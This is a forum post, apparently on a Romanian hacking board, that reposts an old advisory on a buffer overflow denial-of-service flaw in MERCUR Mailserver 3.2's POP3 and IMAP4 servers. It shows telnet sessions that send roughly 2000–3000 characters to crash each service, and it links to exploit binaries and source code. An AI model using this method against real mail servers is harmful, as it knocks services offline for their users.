Jump to content
zbeng

Mercure POP3 Server Hacken

By zbeng, in Tutoriale in engleza

Recommended Posts

zbeng Newbie

zbeng

Posted
Posted

UssrLabs found that the Mercur POP3 and IMAP Server is vulnerable to a Denial of Service attack. The attack is possible due to improper bounds checking.

Details

Vulnerable systems:

MERCUR Mailserver 3.2

MERCUR POP3-Server (v3.20.01) for Windows NT

MERCUR IMAP4-Server (v3.20.01) for Windows NT

Example:

$ telnet example.com 110

Trying example.com...

Connected to example.com.

Escape character is '^]'.

+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 M at 2000 03:30:39 -0300

user [buffer]

Where [buffer] is approximately 2000 characters.

$ telnet example.com 143

Trying example.com...

Connected to example.com.

Escape character is '^]'.

* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000 03:34:09 -0300

[buffer]

Where [buffer] is approximately 3000 characters.

Exploit:

Binary version of the POP3 DoS:

http://www.ussrback.com/mercur/domrc32p.exe

Binary version of the IMAP DoS:

http://www.ussrback.com/mercur/domrc32i.exe

Source code:

http://www.ussrback.com/mercur/merc32ds.zip

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...